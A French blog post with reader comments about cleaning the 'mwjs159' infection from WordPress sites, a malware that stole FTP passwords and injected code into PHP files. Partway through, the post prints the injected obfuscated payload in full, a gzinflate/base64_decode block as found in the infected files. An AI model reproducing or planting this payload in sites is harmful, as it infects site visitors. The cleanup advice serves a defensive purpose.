Comment supprimer le virus mwjs159 sur votre blog WordPress

Hier soir un client m’a alerté: son anti-virus affichait une mise en garde quand il visitait un de mes blogs.

Après vérification je me suis rendu compte que tous mes autres blogs situés sur ce même hébergement étaient infectés.

 

Un coup de scan rapide avec le site http://sitecheck.sucuri.net/scanner/ m’a informé que mon blog avait été victime du virus mwjs159.

 

Selon les informations disponibles à l’heure actuelle, le virus mwjs159 infecte des ordinateurs, vole les mots de passe FTP stockés sur ces ordinateurs et injecte ensuite du code malveillant sur tous les sites situés sur les serveurs FTPs dont il a récupéré les mots de passe.

Décidément, de nos jours les hackers sont de plus en plus tordus !

 

Après avoir réalisé un scan complet de ma machine et de celle de mes collaborateurs je me suis connecté par FTP et j’ai regardé les dates de modification des fichiers.

 

Dans le répertoire principal, les fichiers WordPress index.php, pieddepage.php, wp-blog-header.php et wp-login.php avaient été modifiés à 22h33 hier soir, alors même que je ne m’étais pas connecté par à ce moment-là, c’est donc le virus qui avait du effectuer ces opérations malicieuses.

 

En ouvrant les fichiers en question j’ai trouvé des lignes de ce type:

 

#398c3d#
echo(gzinflate(base64_decode("7Vhdb5swFP0rGapkPJoM8xUQ9V665/Vhe4vyQANpmBrowGlaVfnvM7YZ14W0SdNp0jSp2LV9fX3use8x5KJeVPkd+3xNi2w7Wm6KBcvLwsRPVcY2VTFy4l2cL80P1jX+xqq8uJncVSUr2eNdNmFZzShaJdUlipdlZeajvBidUZTV1arOqhXCfGZOKWIZslDNEF7Ts1k+j1n1+NQsd3X9I1swE0+22Yr/mTjeLRK2WJk/8VNdU8OId43pNi/ScjtDjZd7/iS3aG6ipE6TGmEwg0qEM2NZGZZRri8Na83r1LD41Hm8S0WMXxKW8ZVSp2ulk/vkdpNdLU08dnAsYYFA+VI8KtQQ8bQTLdq0cULTcrFZZwWboQUHViFLgEz4w9T/31X9oPq+8qfkTyr6eRyuQxBuXCeTNGEJpbwDP9Ax+Wim45TDKehs/GBNz9uC2K6s7KZyZRk2ZRTKgUg0pDHxZZ9oRZFsSDviNZXnyT4CDORIoJYL4NS9fggRsALVEBahI6x9sMI0gF3AmwzBlT0BDCQEHuW4K72L0pMOSddPHHKuMTZAGyHOHhxqRMERXf5zV47bUd9yEQASVET2fjSnbBWZApxtWNJCo1KM++ExwSvIxIVmYtwH9BPb0TZeVWKuL3jw/K5sqbE9CFtNkgTIwBQNNjxpykULyNcWBFG0S7mANd0rAQYB6fagJdoGlBANuFxOnTwbboH0FmlpILmBdHnT7pxqXqRpC8DVcEKWDnJGXI2bqJe72g6SQDs8LgxHG7KD/ilT3v0AQoVc6MyGXQ6pQ9LusbbubwJd7RiE3VJyd6JAm6unn99LBn9IxWzIbtAx2qL0NJT2sJmkMrC7NHt2Cl9JNjlTpumLQgNFzNYOaAjlYz997Xl7swLukVQCxVzNsnuXkw+k5QTdi6DsSbOov93HXVrw0jlYI6fPN0xN8bzeFdDepO6QXjr9pBs4vxrEAWFWsuD8l+cDduUFeWzt3kMYB+7KV+RRGp8E/I3KCrC+SV9PR/6CNMOLL3gnnoa0/eh1/lB6v/Za0U/2gfeBv6JMh77LHBvBO743/xOfOEo1fZjzxO4hlh4Dvy9BbbBhh6i9rfe9g8zl5z214/yimNxmxQ1bxbll4bq2aG1m/OvZNAr+zT3LeTE3MI5FX13j+OKT+oXhFw==")));
#/398c3d#

J’ai donc enlevé toutes ces lignes et refait un scan pour m’assurer que mes blogs n’étaient plus compromis.

A noter que le virus infecte également les fichiers situés dans les sous-répertoires donc il faut les ouvrir un par un et trier les fichiers par date de dernière modification pour trouver les fichiers infectés et les nettoyer.

 

Est-ce que vous avez également été infecté par le virus  mwjs159 ? Laissez un commentaire pour raconter comment vous en êtes venu à bout

Click Here to Leave a Comment Below 17 comments
Grégory Marchal - 24 septembre 2011 at 14 h 13 min

Wow, qu’ils sont malins ces hackers !

Quel anti-virus permet de détecter des virus sur des blogs simplement en naviguant dessus ?

[Reply]

Aurélien Amacker Reply:
septembre 24th, 2011 at 16 h 20 min

Avast antivirus par exemple te signale des sites malveillants puisqu’il détecte des tentatives d’intrusion sur ton ordinateur.

[Reply]

Grégory Marchal Reply:
septembre 27th, 2011 at 11 h 34 min

OK. Merci !

[Reply]

Reply
Alex | WP Themes Pro - 24 septembre 2011 at 14 h 13 min

Tout s’explique, c’est pour cela que Google Chrome m’annonce que RMIF contient un logiciel malveillant.
Ce message s’affiche toujours à l’heure actuelle, il faut surement le temps que les robots de Google repassent sur ton site…

[Reply]

Aurélien Amacker Reply:
septembre 24th, 2011 at 16 h 21 min

RMIF n’est plus infecté mais du coup il a été blacklisté par Google et j’ai fait une demande dans Google Webmaster Tools pour qu’il soit examiné à nouveau.

[Reply]

Reply
Xavier | 301Powered - 24 septembre 2011 at 14 h 13 min

J’ai été infecté par ce virus il y a environ trois ans. Depuis je n’ai plus enregistré mes mots de passe dans mon logiciel FTP.

Je réfléchis à une solution sécuriser pour injecter automatiquement le mot de passe dans le logiciel FTP quand je l’utilise, mais pour l’instant les mdp sont dans des fichiers txt protégés et je fais du copier-coller à chaque fois. Ce n’est pas top, mais ça évite de se remanger le virus 😉

Sinon peut-être qu’un bon firewall peut faire l’affaire puisqu’il nous demande à chaque fois ce qui doit rentrer et sortir, mais à vérifier.

[Reply]

Reply
ludovic - 24 septembre 2011 at 14 h 13 min

J’ai également été infecté il y a peu mais par trojan (je n’ai plus le nom exact). Les clients qui avaient avast avaient une alerte lorsqu’ils arrivaient sur mon blog (pas tip top). J’ai du faire une mise à jour wordpress et remplacer le fichier index.php par l’original (j’avais des lignes bizarres). ça a réglé le problème.

[Reply]

Reply
Le Marketeur Francais - 24 septembre 2011 at 14 h 13 min

En fait, le virus est un malin, il ne s’attaque pas qu’à WordPress mais aussi à tous les fichiers index.php.

Voici la manipulation complète :
Attention, pour qu’elle fonctionne, il faut configurer Filezilla pour :
1. conserver les dates de modification des fichiers lors du téléchargement. (Transfert > Preserver l’horodatage)
et 2. ne renvoyer sur le serveur que les fichiers plus récents ou de taille différente (Transfert > Action par défaut sur les fichiers existants…)

Puis voici les étapes :
– Il faut donc télécharger le site sur son poste,
– faire une recherche de tous les fichiers « *.php »,
– trier par date de modif,
– repérer les fichiers modifiés en masse à la meme minute,
– tous les ouvrir dans un éditeur de texte (comme Notepad++),
– localiser l’instruction pirate dans un fichier,
– et faire « remplacer par (rien du tout) dans tous les fichiers »,
– vérifier que le nombre de remplacements est égal au nombre de fichiers ouverts,
– puis sauvegarder tous les fichiers et les remettre en ligne.

Et évidemment en plus de tout cela, il faut désinfecter le poste qui a le virus.

Sébastien

[Reply]

Pascal Reply:
septembre 28th, 2011 at 18 h 45 min

Malheureusement WordPress est victime de son succes et tres apprécier des hackers…qui s’en donnent a coeur joie. Récemment victime aussi de ce genre d’attaque, il faut prêter une particuliere attention a la sécurisation, car wp est un nid a intrusions.
Si vous ne faites pas cela, les attaques vont devenir récurrentes.
– Déja les fichiers .htaccess sont a placer a plusieurs endroits.
– Vérifier dans sa base de données si des tables pirates ont été ajoutées comme la table var_core.
– Changer les tables avec préfixe WP_ , prévue par défaut sur l’installation de worpress.
– Effacer la version utilisée de WP
– Si vous utiliser FTP filezilla, faites des sessions uniques et supprimer l’historique apres. Supprimer aussi le fichier filezilla.xml créé dans votre pc.
– Placer des fichier index.php meme vierge, dans les tous le répertoires et sous-repertoires du WP.
….Sorry, je vais raccourcir, car je vais pas m’imposer. Juste pour vous sensibiliser sur le fait que la sécurité WP est qque chose a prendre au sérieux et nécessite une procédure tres systematique. Sinon vous en serez pour vos frais, régulierement et de façon récurrente (une fois la faille trouvée, juste désinstaller les fichiers infectés ne SUFFIT malheureusement pas).
Je vais, a ce titre écrire un article détaillé sur mon blog, car je vois que ça pourrait servir a beaucoup.

Amicalement
Pascal

[Reply]

Reply
Binh - 24 septembre 2011 at 14 h 13 min

Merci pour l’astuce ! Je suis clean pour le moment, mais je vais vite prendre mes dispositions pour éviter de me faire détruire mon site…

[Reply]

Reply
Thierry Valker - 24 septembre 2011 at 14 h 13 min

Salut Aurélien

Je touche du bois, pour le moment, je n’ai jamais été infecté.
@Sebastien
@Pascal

Merci pour ces conseils. Bookmarké.

[Reply]

Reply
Bruno - 24 septembre 2011 at 14 h 13 min

Bonjour Aurélien,

J’ai testé mon blog apparemment c’est nickel pour le moment.

Merci pour le conseil.

[Reply]

Reply
Adam@comment grossir - 24 septembre 2011 at 14 h 13 min

Qui s’amuse à inventer ce type de virus ? Toutes les opérations étant traçable, n’y a t-il pas un moyen de tuer le virus à la source ?

[Reply]

Reply
chris - 24 septembre 2011 at 14 h 13 min

J’ai eu le même problème, mon collègue a chopé ce virus (je ne sais comment), il a récupérer tous nos mots de passe (mutualisé en plus) et modifié tous les index, page, header, footers etc… Mon hébergeur s’est apperçu de cela par rapport aux logs des IP/horaires.

Du coup on a désinfecté toutes les machines, changé tous les mots de passe FTP, uploadé les pages clean (avec un filtre dans filzilla pour n’afficher que index etc… Ca a été très rapide… J’ai isolé les wordpress sur un autre hébergement et nous ne stockons plus les mots de passe dans le gestionnaire de filezilla (on le tape à chaque fois).

Je pense que ça ne risque pas de revenir (vu que les pc sont clean et les mdp changés).

Quelqu’un d’autre a eu le problème ???

Merci

a+

[Reply]

Reply
Blogueuse égarée - 24 septembre 2011 at 14 h 13 min

Mon blog est infecté par un virus. Mon pareèfeu parle de « Virus Spyware Mal/FakeAvCn-A ». Je n’ai aucune idée de ce que je peux faire ! Où trouver des solutions ?

[Reply]

Reply
Mart1 - 24 septembre 2011 at 14 h 13 min

Bonjour,
J’ai aussi été infecté par ce virus. J’ai des bouts de code qui ont affecté des fichiers php, html (juste des commentaires), .htaccess et ce sur plusieurs sites dont j’avais mémorisé l’accès ftp sur filezilla.
Grâce à Aurélien et Sébastien, j’ai résolu le problème. Je ne suis pas sur d’avoir désinfecté correctement mon pc donc je supprime les mots de passe enregistrés sur filezilla.
Merci!

[Reply]

Reply
JR_Freelance - 24 septembre 2011 at 14 h 13 min

Filezilla est un cancer dans la sécurité de vos sites internet. J’ai déjà eu un souci similaire (je ne sais pas si c’était le même virus car ça m’est arrivé il y à environ 6 mois…).

Notez tout sur feuille de papier, c’est beaucoup plus sécurisé 😉

[Reply]

Reply

Leave a Reply:

Pas de commentaire avec des ancres optimisées du style "gagner de l'argent" ou "casino en ligne", merci.